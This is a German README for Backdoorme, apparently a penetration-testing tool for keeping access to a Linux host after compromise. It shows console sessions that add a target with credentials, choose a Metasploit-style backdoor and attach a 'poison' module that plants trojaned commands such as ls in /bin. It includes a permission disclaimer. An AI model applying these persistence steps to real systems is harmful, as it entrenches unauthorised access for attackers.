
Leistungsstarkes Auto-Backdooring-Dienstprogramm
Werkzeuge wie Metasploit sind großartig, um Computer auszunutzen, aber was passiert, nachdem du Zugriff auf einen Computer erlangt hast? Backdoorme beantwortet diese Frage, indem es eine Vielzahl von Hintertüren (Backdoors) einsetzt, um über lange Zeiträume Persistenz zu etablieren.
Sobald eine SSH-Verbindung zum Ziel hergestellt wurde, können die Stärken von Backdoorme zur Geltung kommen. Leider ist Backdoorme kein Werkzeug, um Root-Zugriff zu erlangen – nur, um diesen Zugriff zu behalten, sobald er erlangt wurde.
Bitte verwende Backdoorme nur mit ausdrücklicher Erlaubnis – bitte hacke nicht ohne zu fragen.
Backdoorme ist in zwei Teile aufgeteilt: Backdoors und Module.
Backdoors sind kleine Code-Schnipsel, die auf einem Port lauschen und zu einem Interpreter wie Bash umleiten. Es gibt viele Backdoors in verschiedenen Sprachen, um Abwechslung zu bieten.
Module machen die Backdoors wirkungsvoller, indem sie sie häufiger ausführen, zum Beispiel alle paar Minuten oder beim Systemstart. Dies hilft, Persistenz zu etablieren.
Demonstration:
Um Backdoorme zu starten, stelle zunächst sicher, dass die erforderlichen Abhängigkeiten installiert sind.
Für Python 3.5+:
$ sudo apt-get install python3 python3-pip python3-tk nmap
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt
Für Python 2.7:
$ sudo python dependencies.py
Backdoorme starten:
$ python master.py
Um ein Ziel hinzuzufügen:
>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>>
Um eine Backdoor zu verwenden, führe einfach das Schlüsselwort "use" aus.
>> use shell/metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) >>
Von dort aus kannst du für die Backdoor relevante Optionen setzen. Führe entweder "show options" oder "help" aus, um eine Liste der konfigurierbaren Parameter zu sehen. Um eine Option zu setzen, verwende einfach das Schlüsselwort "set".
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name initd name of the backdoor False
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name apache name of the backdoor False
...
Wie in Metasploit sind die Backdoors nach Kategorien organisiert.
Jede Backdoor kann mit zusätzlichen Modulen ausgestattet werden, um sie wirkungsvoller zu machen. Um ein Modul hinzuzufügen, verwende einfach das Schlüsselwort "add".
(msf) >> add poison
+ Poison module added
Jedes Modul hat zusätzliche Parameter, die angepasst werden können. Wenn "help" erneut ausgeführt wird, kannst du die zusätzlichen Optionen sehen oder setzen.
(msf) >> help
...
Poison module options:
Option Value Description Required
------ ----- ----------- --------
name ls name of command to poison False
location /bin where to put poisoned files into False
Derzeit verfügbare Module umfassen:
Backdoorme unterstützt mehrere verschiedene Ziele gleichzeitig, die bei der Eingabe nummeriert werden. Der Kern verwaltet ein „aktuelles“ Ziel, auf das sich alle neuen Backdoors standardmäßig beziehen. Um manuell zwischen den Zielen zu wechseln, füge einfach die Zielnummer nach dem Befehl hinzu: "use metasploit 2" bereitet die Metasploit-Backdoor für das zweite Ziel vor. Führe "list" aus, um die Liste der aktuellen Ziele zu sehen, ob eine Verbindung offen oder geschlossen ist und welche Backdoors & Module verfügbar sind.
Backdoorme steckt noch in den Kinderschuhen! Du kannst gerne zum Projekt beitragen – forke es einfach, nimm deine Änderungen vor und sende einen Pull-Request. Hast du eine Idee für eine überragende Backdoor oder etwas, das wir verbessern könnten? Erstelle ein Issue und wir fügen es ASAP hinzu! Bitte sende uns eine E-Mail an [email protected] bei Fragen.
Wenn du eine eigene Backdoor hinzufügen möchtest, folge den Anweisungen in der Datei backdoorme/backdoors/template.py.
Wenn du ein eigenes Modul hinzufügen möchtest, folge den Anweisungen in der Datei backdoorme/modules/template.py.
Spickzettel für Entwickler: